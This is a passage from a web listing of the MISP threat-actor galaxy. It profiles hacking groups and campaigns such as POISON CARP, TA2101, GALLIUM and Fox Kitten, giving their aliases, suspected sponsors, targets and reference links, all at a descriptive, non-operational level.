- https://www.symantec.com/blogs/threat-intelligence/tortoiseshell-apt-supply-chain - webarchive
- https://www.darkreading.com/threat-intelligence/iranian-government-hackers-target-us-veterans/d/d-id/1335897 - webarchive
- https://ctoatncsc.substack.com/p/cto-at-ncsc-summary-week-ending-october - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html - webarchive
- https://ics-cert.kaspersky.com/publications/reports/2023/09/25/apt-and-financial-attacks-on-industrial-organizations-in-h1-2023/ - webarchive
- https://services.google.com/fh/files/misc/tool-of-first-resort-israel-hamas-war-cyber.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Iran (Islamic Republic of) |
cfr-suspected-victims | ['United States', 'Israel', 'Middle East', 'Europe'] |
cfr-target-category | ['Defense', 'Government', 'Military', 'Finance', 'Energy', 'Healthcare', 'Pharmaceuticals', 'Telecoms', 'High-Tech', 'Media', 'NGOs', 'Civil Society', 'Legal', 'Rail', 'Transportation'] |
cfr-type-of-incident | Espionage |
country | IR |
POISON CARP
Between November 2018 and May 2019, senior members of Tibetan groups received malicious links in individually tailored WhatsApp text exchanges with operators posing as NGO workers, journalists, and other fake personas. The links led to code designed to exploit web browser vulnerabilities to install spyware on iOS and Android devices, and in some cases to OAuth phishing pages. This campaign was carried out by what appears to be a single operator that we call POISON CARP.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular POISON CARP.
Known Synonyms |
---|
Earth Empusa |
Evil Eye |
Red Dev 16 |
Internal MISP references
UUID 7aa99279-4255-4d26-bb95-12e7156555a0
which can be used as unique global reference for POISON CARP
in MISP communities and other software using the MISP galaxy
External references
- https://citizenlab.ca/2019/09/poison-carp-tibetan-groups-targeted-with-1-click-mobile-exploits/ - webarchive
- https://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/ - webarchive
- https://www.trendmicro.com/en_us/research/20/f/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
TA410
Early in August 2019, Proofpoint described what appeared to be state-sponsored activity targeting the US utilities sector with malware that we dubbed “Lookback”. Between August 21 and August 29, 2019, several spear phishing emails were identified targeting additional US companies in the utilities sector. The phishing emails originated from what appears to be an actor-controlled domain: globalenergycertification[.]net. This domain, like those used in previous campaigns, impersonated a licensing body related to the utilities sector. In this case, it masqueraded as the legitimate domain for Global Energy Certification (“GEC”). The emails include a GEC examination-themed body and a malicious Microsoft Word attachment that uses macros to install and run LookBack. (Note confusion between Malware, Campaign and ThreatActor)
Internal MISP references
UUID 5cd95926-0098-435e-892d-9c9f61763ad7
which can be used as unique global reference for TA410
in MISP communities and other software using the MISP galaxy
External references
- https://www.proofpoint.com/us/threat-insight/post/lookback-forges-ahead-continued-targeting-united-states-utilities-sector-reveals - webarchive
- https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new - webarchive
Associated metadata
Metadata key | Value |
---|---|
Operation Soft Cell
In 2018, the Cybereason Nocturnus team identified an advanced, persistent attack targeting global telecommunications providers carried out by a threat actor using tools and techniques commonly associated with Chinese-affiliated threat actors, such as APT10. This multi-wave attacks focused on obtaining data of specific, high-value targets and resulted in a complete takeover of the network.
Internal MISP references
UUID 8dda51ef-9a30-48f7-b0fd-5b6f0a62262d
which can be used as unique global reference for Operation Soft Cell
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
threat-actor-classification | ['operation'] |
Related clusters
To see the related clusters, click here.
Operation WizardOpium
We are calling these attacks Operation WizardOpium. So far, we have been unable to establish a definitive link with any known threat actors. There are certain very weak code similarities with Lazarus attacks, although these could very well be a false flag. The profile of the targeted website is more in line with earlier DarkHotel attacks that have recently deployed similar false flag attacks.
Internal MISP references
UUID 75db4269-924b-4771-8f62-0de600a43634
which can be used as unique global reference for Operation WizardOpium
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
threat-actor-classification | ['operation'] |
Calypso
For the first time, the activity of the Calypso group was detected by specialists of PT Expert Security Center in March 2019, during the work to detect cyber threats. As a result, many malware samples of this group were obtained, affected organizations and control servers of intruders were identified. According to our data, the group has been active since at least September 2016. The main goal of the group is to steal confidential data, the main victims are government agencies from Brazil, India, Kazakhstan, Russia, Thailand, Turkey. Our data suggest that the group has Asian roots. Description translated from Russian.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Calypso.
Known Synonyms |
---|
BRONZE MEDLEY |
Internal MISP references
UUID 200d04c8-a11f-45c4-86fd-35bb5de3f7a3
which can be used as unique global reference for Calypso
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
targeted-sector | ['Government, Administration'] |
TA2101
Proofpoint researchers detected campaigns from a relatively new actor, tracked internally as TA2101, targeting German companies and organizations to deliver and install backdoor malware. The actor initiated their campaigns impersonating the Bundeszentralamt fur Steuern, the German Federal Ministry of Finance, with lookalike domains, verbiage, and stolen branding in the emails. For their campaigns in Germany, the actor chose Cobalt Strike, a commercially licensed software tool that is generally used for penetration testing and emulates the type of backdoor framework used by Metasploit, a similar penetration testing tool. Proofpoint researchers have also observed this actor distributing Maze ransomware, employing similar social engineering techniques to those it uses for Cobalt Strike, while also targeting organizations in Italy and impersonating the Agenzia Delle Entrate, the Italian Revenue Agency. We have also recently observed the actor targeting organizations in the United States using the IcedID banking Trojan while impersonating the United States Postal Service (USPS).
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TA2101.
Known Synonyms |
---|
DEV-0216 |
GOLD VILLAGE |
Maze Team |
Storm-0216 |
TWISTED SPIDER |
Twisted Spider |
Internal MISP references
UUID 39925aa0-c7bf-4b9b-97d6-7d600329453d
which can be used as unique global reference for TA2101
in MISP communities and other software using the MISP galaxy
External references
- https://www.proofpoint.com/us/threat-insight/post/ta2101-plays-government-imposter-distribute-malware-german-italian-and-us - webarchive
- https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/ - webarchive
- https://adversary.crowdstrike.com/adversary/twisted-spider/ - webarchive
- https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf - webarchive
- https://www.secureworks.com/blog/how-cyber-adversaries-are-adapting-to-exploit-the-global-pandemic - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-village - webarchive
- https://www.cysecurity.news/2023/12/twisted-spiders-dangerous-cactus.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | RU |
APT-C-34
As reported by ZDNet, Chinese cyber-security vendor Qihoo 360 published a report on 2019-11-29 exposing an extensive hacking operation targeting the country of Kazakhstan. Targets included individuals and organizations involving all walks of life, such as government agencies, military personnel, foreign diplomats, researchers, journalists, private companies, the educational sector, religious figures, government dissidents, and foreign diplomats alike. The campaign, Qihoo 360 said, was broad, and appears to have been carried by a threat actor with considerable resources, and one who had the ability to develop their private hacking tools, buy expensive spyware off the surveillance market, and even invest in radio communications interception hardware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT-C-34.
Known Synonyms |
---|
Golden Falcon |
Internal MISP references
UUID feb0cfef-0472-4108-83d7-1a322d8ab86b
which can be used as unique global reference for APT-C-34
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
luoxk
Luoxk is a malware campaign targeting web servers throughout Asia, Europe and North America.
Internal MISP references
UUID 69e11692-691e-4bfb-9557-4e2a271684ed
which can be used as unique global reference for luoxk
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
since | 2017 |
RAZOR TIGER
An actor mainly targeting Pakistan military targets, active since at least 2012. We have low confidence that this malware might be authored by an Indian company. To spread the malware, they use unique implementations to leverage the exploits of known vulnerabilities (such as CVE-2017-11882) and later deploy a Powershell payload in the final stages.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RAZOR TIGER.
Known Synonyms |
---|
APT-C-17 |
Rattlesnake |
SideWinder |
T-APT-04 |
Internal MISP references
UUID c4ce1174-9462-47e9-8038-794f40a184b3
which can be used as unique global reference for RAZOR TIGER
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/apt-trends-report-q1-2018/85280/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/first-active-attack-exploiting-cve-2019-2215-found-on-google-play-linked-to-sidewinder-apt-group/ - webarchive
- https://otx.alienvault.com/pulse/5fd10760f9afb730d37c4742/ - webarchive
- https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html - webarchive
- https://s.tencent.com/research/report/659.html - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/fireeye-sidewinder-targeted-attack.pdf - webarchive
- https://s.tencent.com/research/report/479.html - webarchive
- https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c - webarchive
- https://mp.weixin.qq.com/s/8j_rHA7gdMxY1_X8alj8Zg - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-state-sponsor | India |
cfr-suspected-victims | ['China', 'Pakistan', 'Nepal', 'Afghanistan'] |
cfr-target-category | ['Government', 'Military', 'Private Sector'] |
country | IN |
Related clusters
To see the related clusters, click here.
Operation Wocao
Operation Wocao (我操, “Wǒ cāo”, used as “shit” or “damn”) is the name that Fox-IT uses to describe the hacking activities of a Chinese based hacking group. This report details the profile of a publicly underreported threat actor that Fox-IT has dealt with over the past two years. Fox-IT assesses with high confidence that the actor is a Chinese group and that they are likely working to support the interests of the Chinese government and are tasked with obtaining information for espionage purposes. With medium confidence, Fox-IT assesses that the tools, techniques and procedures are those of the actor referred to as APT20 by industry partners. We have identified victims of this actor in more than 10 countries, in government entities, managed service providers and across a wide variety of industries, including Energy, Health Care and High-Tech.
Internal MISP references
UUID c432d032-ce2b-4eb8-ba87-312b2a43fb7a
which can be used as unique global reference for Operation Wocao
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Budminer
Based on the evidence we have presented Symantec attributed the activity involving theDripion malware to the Budminer advanced threat group. While we have not seen newcampaigns using Taidoor malware since 2014, we believe the Budminer group has changedtactics to avoid detection after being outed publicly in security white papers and blogs over thepast few years.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Budminer.
Known Synonyms |
---|
Budminer cyberespionage group |
Internal MISP references
UUID 2eb0dc7a-cef6-4744-92ac-2fe269dacb95
which can be used as unique global reference for Budminer
in MISP communities and other software using the MISP galaxy
External references
- https://www.symantec.com/connect/blogs/taiwan-targeted-new-cyberespionage-back-door-trojan - webarchive
- https://app.box.com/s/xqh458fe1url7mgl072hhd0yxqw3x0jm - webarchive
- https://www.research-collection.ethz.ch/bitstream/handle/20.500.11850/389371/1/Cyber-Reports-2020-01-A-one-sided-Affair.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
suspected-victims | Taiwan |
Attor
Adversary group targeting diplomatic missions and governmental organisations.
Internal MISP references
UUID 947a450a-df6c-4c2e-807b-0da8ecea1d26
which can be used as unique global reference for Attor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-target-category | ['Private sector', 'Government'] |
cfr-type-of-incident | Espionage |
APT-C-12
According to 360 TIC the actor has carried out continuous cyber espionage activities since 2011 on key units and departments of the Chinese government, military industry, scientific research, and finance. The organization focuses on information related to the nuclear industry and scientific research. The targets were mainly concentrated in mainland China...[M]ore than 670 malware samples have been collected from the group, including more than 60 malicious plugins specifically for lateral movement; more than 40 C2 domain names and IPs related to the organization have also been discovered.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT-C-12.
Known Synonyms |
---|
Blue Mushroom |
NuclearCrisis |
Sapphire Mushroom |
Internal MISP references
UUID 53771ca5-f1cb-47b6-a92a-53a485307cf7
which can be used as unique global reference for APT-C-12
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-target-category | ['Private sector', 'Government', 'Military', 'Scientific Research', 'Finance'] |
cfr-type-of-incident | Espionage |
suspected-victims | China |
InvisiMole
Adversary group targeting diplomatic missions, governmental and military organisations, mainly in Ukraine.
Internal MISP references
UUID 87af83a4-ced4-4e7c-96a6-86612dc095b1
which can be used as unique global reference for InvisiMole
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Ukraine'] |
cfr-target-category | ['Government'] |
cfr-type-of-incident | Espionage |
ANTHROPOID SPIDER
Publicly known as 'EmpireMonkey', ANTHROPOID SPIDER conducted phishing campaigns in February and March 2019, spoofing French, Norwegian and Belizean financial regulators and institutions. These campaigns used macro-enabled Microsoft documents to deliver the PowerShell Empire post-exploitation framework. ANTHROPOID SPIDER likely enabled a breach that allegedly involved fraudulent transfers over the SWIFT network.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ANTHROPOID SPIDER.
Known Synonyms |
---|
CobaltGoblin |
Empire Monkey |
Internal MISP references
UUID 559a64d8-8657-4a93-9208-060d52efdec4
which can be used as unique global reference for ANTHROPOID SPIDER
in MISP communities and other software using the MISP galaxy
External references
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://www.kaspersky.com/about/press-releases/2019_fin7-hacking-group-targets-more-than-130-companies-after-leaders-arrest - webarchive
- https://fortiguard.com/encyclopedia/botnet/7630456 - webarchive
Associated metadata
Metadata key | Value |
---|---|
targeted-sector | ['Finance'] |
CLOCKWORK SPIDER
Opportunistic actor that installs custom root certificate on victim to support man-in-the-middle network monitoring.
Internal MISP references
UUID 2d2f3b53-c544-4823-a65f-da53ff8f594e
which can be used as unique global reference for CLOCKWORK SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
DOPPEL SPIDER
In June 2019, CrowdStrike Intelligence observed a source code fork of BitPaymer and began tracking the new ransomware strain as DoppelPaymer. Further technical analysis revealed an increasing divergence between two versions of Dridex, with the new version dubbed DoppelDridex. Based on this evidence, CrowdStrike Intelligence assessed with high confidence that a new group split off from INDRIK SPIDER to form the adversary DOPPEL SPIDER. Following DOPPEL SPIDER’s inception, CrowdStrike Intelligence observed multiple BGH incidents attributed to the group, with the largest known ransomware demand being 250 BTC. Other demands were not nearly as high, suggesting that the group conducts network reconnaissance to determine the value of the victim organization.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DOPPEL SPIDER.
Known Synonyms |
---|
GOLD HERON |
Internal MISP references
UUID 2154b183-c5c5-418f-8e47-f6e999b64e30
which can be used as unique global reference for DOPPEL SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
MONTY SPIDER
Spambots continued to decline in 2019, with MONTY SPIDER’s CraP2P spambot falling silent in April.
Internal MISP references
UUID 168a9e38-70e3-4542-b78f-afa2414436bb
which can be used as unique global reference for MONTY SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
NARWHAL SPIDER
NARWHAL SPIDER’s operation of Cutwail v2 was limited to country-specific spam campaigns, although late in 2019 there appeared to be an effort to expand by bringing in INDRIK SPIDER as a customer.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NARWHAL SPIDER.
Known Synonyms |
---|
GOLD ESSEX |
TA544 |
Internal MISP references
UUID fda9cdea-0017-495e-879d-0f348db2aa07
which can be used as unique global reference for NARWHAL SPIDER
in MISP communities and other software using the MISP galaxy
External references
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-essex - webarchive
- https://www.proofpoint.com/us/threat-insight/post/brushaloader-still-sweeping-victims-one-year-later - webarchive
- https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much - webarchive
- https://www.proofpoint.com/us/threat-insight/post/urlzone-top-malware-japan-while-emotet-and-line-phishing-round-out-landscape-0 - webarchive
- https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/q4-2020-threat-report-quarterly-analysis-cybersecurity-trends-tactics-and-themes - webarchive
Associated metadata
Metadata key | Value |
---|---|
NOCTURNAL SPIDER
Mentioned as MaaS operator in CrowdStrike's 2020 Report.
Internal MISP references
UUID c042c592-25f6-4887-8a1b-6b8e3bfdcf0c
which can be used as unique global reference for NOCTURNAL SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
SCULLY SPIDER
Mentioned as operator of DanaBot in CrowdStrike's 2020 Report.
Internal MISP references
UUID 7fb1662e-0257-4606-b3a2-bf294c64c098
which can be used as unique global reference for SCULLY SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
SMOKY SPIDER
Mentioned as operator of SmokeLoader in CrowdStrike's 2020 Report.
Internal MISP references
UUID e27796eb-624a-4e41-aa40-52d47c764b07
which can be used as unique global reference for SMOKY SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
VENOM SPIDER
VENOM SPIDER is the developer of a large toolset that includes SKID, VenomKit and Taurus Loader. Under the moniker 'badbullzvenom', the adversary has been an active member of Russian underground forums since at least 2012, specializing in the identification of vulnerabilities and the subsequent development of tools for exploitation, as well as for gaining and maintaining access to victim machines and carding services. Recent advertisements for the malware indicate that VENOM SPIDER limits the sale and use of its tools, selling modules only to trusted affiliates. This preference can be seen in the fact that adversaries observed using the tools include the targeted criminal adversary COBALT SPIDER and BGH adversaries WIZARD SPIDER and PINCHY SPIDER.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular VENOM SPIDER.
Known Synonyms |
---|
badbullz |
badbullzvenom |
Internal MISP references
UUID 86b4e2f3-8bbf-48fd-9d27-034d3ac3b187
which can be used as unique global reference for VENOM SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Operation Shadow Force
Operation Shadow Force is a group of malware that is representative of Shadow Force and Wgdrop from 2013 to 2020, and is a group activity that attacks Korean companies and organizations. The group's first confirmed attack was in March 2013, but considering the date of malware creation, it is likely to have been active before 2012. Since the malware used mainly by them is Shadow Force, it was named Operation Shadow Force, and it has not been confirmed whether the attacker is associated with a known group.
Internal MISP references
UUID f628b544-48b6-44e2-b794-950713353cf1
which can be used as unique global reference for Operation Shadow Force
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
NOTROBIN
Researchers at FireEye report finding a hacking group (dubbed NOTROBIN) that has been bundling mitigation code for NetScaler servers with its exploits. In effect, the hackers exploit the flaw to get access to the server, kill any existing malware, set up their own backdoor, then block off the vulnerable code from future exploit attempts by mitigation.
Internal MISP references
UUID 21d08f2c-97b2-444e-be49-8457093b841a
which can be used as unique global reference for NOTROBIN
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
ItaDuke
ItaDuke is an actor known since 2013. It used PDF exploits for dropping malware and Twitter accounts to store C2 server urls. On 2018, an actor named DarkUniverse, which was active between 2009 to 2017, was attributed to this ItaDuke by Kaspersky.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ItaDuke.
Known Synonyms |
---|
DarkUniverse |
SIG27 |
Internal MISP references
UUID d0b900fa-84b4-11ea-bc55-0242ac130003
which can be used as unique global reference for ItaDuke
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Nazar
This actor was identified by Juan Andres Guerrero-Saade from the SIG37 cluster as published in the ShadowBrokers' 'Lost in Translation' leak. Earliest known sighting potentially dates back to as far as 2008 with a confirmed center of activity around 2010-2013. The actor name is derived from a PDB debug string fragment: 'khzer'. Victimology indicates targeting of Iran, assessed with low confidence based on VT file submission locations. Nazar employs a modular toolkit where a main dropper silently registers multiple DLLs as OLE controls in the Windows registry. Functionality includes keylogging, sound and screen grabbing, as well as traffic capture using the MicroOlap Packet Sniffer library.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Nazar.
Known Synonyms |
---|
SIG37 |
Internal MISP references
UUID 169187c5-9fbe-42df-ae92-6e35846db021
which can be used as unique global reference for Nazar
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Higaisa
The organization often uses important North Korean time nodes such as holidays and North Korea to conduct fishing activities. The bait includes New Year blessings, Lantern blessings, North Korean celebrations, and important news, overseas personnel contact lists and so on. In addition, the attack organization also has the attack capability of the mobile terminal. The targets of the attack also include diplomatic entities related to North Korea (such as embassy officials in various places), government officials, human rights organizations, North Korean residents abroad, and traders. The victim countries currently monitored include China, North Korea, Japan, Nepal, Singapore, Russia, Poland, Switzerland, etc.
Internal MISP references
UUID a9df6cb7-74ff-482f-b23b-ac40e975a31a
which can be used as unique global reference for Higaisa
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-state-sponsor | Korea (Republic of) |
cfr-suspected-victims | ['China', 'North Korea', 'Japan', 'Nepal', 'Singapore', 'Russia', 'Poland', 'Switzerland'] |
cfr-target-category | ['Government'] |
country | KR |
COBALT JUNO
COBALT JUNO has operated since at least 2013 and focused on targets located in the Middle East including Iran, Jordan, Egypt & Lebanon. COBALT JUNO custom spyware families SABER1 and SABER2, include surveillance functionality and masquerade as legitimate software utilities such as Adobe Updater, StickyNote and ASKDownloader. CTU researchers assess with moderate confidence that COBALT JUNO operated the ZooPark Android spyware since at least mid-2015. ZooPark was publicly exposed in 2018 in both vendor reporting and a high profile leak of C2 server data. COBALT JUNO is linked to a private security company in Iran and outsources aspects of tool development work to commercial software developers. CTU researchers have observed the group using strategic web compromises to deliver malware. CTU researchers’ discovery of new C2 domains in 2019 suggest the group is still actively performing operations.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular COBALT JUNO.
Known Synonyms |
---|
APT-C-38 (QiAnXin) |
SABER LION |
TG-2884 (SCWX CTU) |
Internal MISP references
UUID 4687e1ab-a361-4165-b142-00845f4b2c62
which can be used as unique global reference for COBALT JUNO
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
COBALT KATANA
COBALT KATANA has been active since at least March 2018, and it focuses many of its operations on organizations based in or associated with Kuwait. The group has targeted government, logistics, and shipping organizations. The threat actors gain initial access to targets using DNS hijacking, strategic web compromise with SMB forced authentication, and password brute force attacks. COBALT KATANA operates a custom platform referred to as the Sakabota Framework, also referred to as Sakabota Core, with a complimentary set of modular backdoors and accessory tools including Gon, Hisoka, Hisoka Netero, Killua, Diezen, and Eye. The group has implemented DNS tunnelling in its malware and malicious scripts and also operates the HyphenShell web shell to strengthen post-intrusion access. CTU researchers assess with moderate confidence that COBALT KATANA operates on behalf of Iran, and elements of its operations such as overlapping infrastructure, use of DNS hijacking, implementation of DNS-based C2 channels in malware and web shell security mechanisms suggest connections to COBALT GYPSY and COBALT EDGEWATER.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular COBALT KATANA.
Known Synonyms |
---|
Hive0081 (IBM) |
Hunter Serpens |
SectorD01 (NHSC) |
xHunt campaign (Palo Alto) |
Internal MISP references
UUID d1c25b0e-e4c5-4b7c-b790-2e185cb2f07e
which can be used as unique global reference for COBALT KATANA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Dark Basin
Dark Basin is a hack-for-hire group that has targeted thousands of individuals and hundreds of institutions on six continents. Targets include advocacy groups and journalists, elected and senior government officials, hedge funds, and multiple industries. Dark Basin extensively targeted American nonprofits, including organisations working on a campaign called #ExxonKnew, which asserted that ExxonMobil hid information about climate change for decades. We also identify Dark Basin as the group behind the phishing of organizations working on net neutrality advocacy, previously reported by the Electronic Frontier Foundation. We link Dark Basin with high confidence to an Indian company, BellTroX InfoTech Services, and related entitie
Internal MISP references
UUID 3cbc52d5-fe4d-4d7a-a5e9-641b7c073d62
which can be used as unique global reference for Dark Basin
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GALLIUM
GALLIUM, is a threat actor believed to be targeting telecommunication providers over the world, mostly South-East Asia, Europe and Africa. To compromise targeted networks, GALLIUM target unpatched internet-facing services using publicly available exploits and have been known to target vulnerabilities in WildFly/JBoss.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GALLIUM.
Known Synonyms |
---|
Alloy Taurus |
Granite Typhoon |
Red Dev 4 |
Internal MISP references
UUID e400b6c5-77cf-453d-ba0f-44575583ac6c
which can be used as unique global reference for GALLIUM
in MISP communities and other software using the MISP galaxy
External references
- https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/ - webarchive
- https://www.youtube.com/watch?v=fBFm2fiEPTg - webarchive
- https://troopers.de/troopers22/talks/7cv8pz/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/alloytaurus/ - webarchive
- https://unit42.paloaltonetworks.com/alloy-taurus-targets-se-asian-government/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Related clusters
To see the related clusters, click here.
Evilnum
ESET has analyzed the operations of Evilnum, the APT group behind the Evilnum malware previously seen in attacks against financial technology companies. While said malware has been seen in the wild since at least 2018 and documented previously, little has been published about the group behind it and how it operates. The group’s targets remain fintech companies, but its toolset and infrastructure have evolved and now consist of a mix of custom, homemade malware combined with tools purchased from Golden Chickens, a Malware-as-a-Service (MaaS) provider whose infamous customers include FIN6 and Cobalt Group.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Evilnum.
Known Synonyms |
---|
DeathStalker |
EvilNum |
Jointworm |
KNOCKOUT SPIDER |
TA4563 |
Internal MISP references
UUID b6f3150f-2240-4c57-9dda-5144c5077058
which can be used as unique global reference for Evilnum
in MISP communities and other software using the MISP galaxy
External references
- https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/ - webarchive
- https://securelist.com/deathstalker-mercenary-triumvirate/98177/ - webarchive
- https://securelist.com/what-did-deathstalker-hide-between-two-ferns/99616/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/buy-sell-steal-evilnum-targets-cryptocurrency-forex-commodities - webarchive
- https://www.rewterz.com/rewterz-news/rewterz-threat-alert-evilnum-apt-group-active-iocs-7 - webarchive
- https://www.rewterz.com/rewterz-news/rewterz-threat-alert-evilnum-apt-group-targeting-financial-sector - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://www.hivepro.com/wp-content/uploads/2022/08/Vulnerabilities-Threats-that-Matter-25th-to-31st-July.pdf - webarchive
- https://medium.com/bitso-engineering/profiling-disrupting-an-apt-spear-phishing-campaign-targeting-slack-users-in-the-financial-sector-9389533d5fc2 - webarchive
Associated metadata
Metadata key | Value |
---|---|
Fox Kitten
PIONEER KITTEN is an Iran-based adversary that has been active since at least 2017 and has a suspected nexus to the Iranian government. This adversary appears to be primarily focused on gaining and maintaining access to entities possessing sensitive information of likely intelligence interest to the Iranian government. According to DRAGOS, they also targeted ICS-related entities using known VPN vulnerabilities. They are widely known to use open source penetration testing tools for reconnaissance and to establish encrypted communications.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Fox Kitten.
Known Synonyms |
---|
Lemon Sandstorm |
PARISITE |
PIONEER KITTEN |
RUBIDIUM |
UNC757 |
Internal MISP references
UUID bfb0bc20-5bdf-47ff-b07f-dbd9a3cb9772
which can be used as unique global reference for Fox Kitten
in MISP communities and other software using the MISP galaxy
External references
- https://youtu.be/pBDu8EGWRC4?t=2492 - webarchive
- https://www.dragos.com/threat/parisite - webarchive
- https://www.dragos.com/wp-content/uploads/The-ICS-Threat-Landscape.pdf - webarchive
- https://www.dragos.com/wp-content/uploads/NA-EL-Threat-Perspective-2019.pdf - webarchive
- https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign.pdf - webarchive
- https://www.zdnet.com/article/fbi-says-an-iranian-hacking-group-is-attacking-f5-networking-devices - webarchive
- https://www.crowdstrike.com/blog/who-is-pioneer-kitten - webarchive
- https://www.zdnet.com/article/iranian-hackers-are-selling-access-to-compromised-companies-on-an-underground-forum - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-259a - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | IR |
Related clusters
To see the related clusters, click here.
XDSpy
Rare is the APT group that goes largely undetected for nine years, but XDSpy is just that; a previously undocumented espionage group that has been active since 2011. It has attracted very little public attention, with the exception of an advisory from the Belarusian CERT in February 2020. In the interim, the group has compromised many government agencies and private companies in Eastern Europe and the Balkans.
Internal MISP references
UUID b205584e-db93-433a-b97a-7f2e19d8c188
which can be used as unique global reference for XDSpy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
targeted-sector | ['Government, Administration'] |
Evil Corp
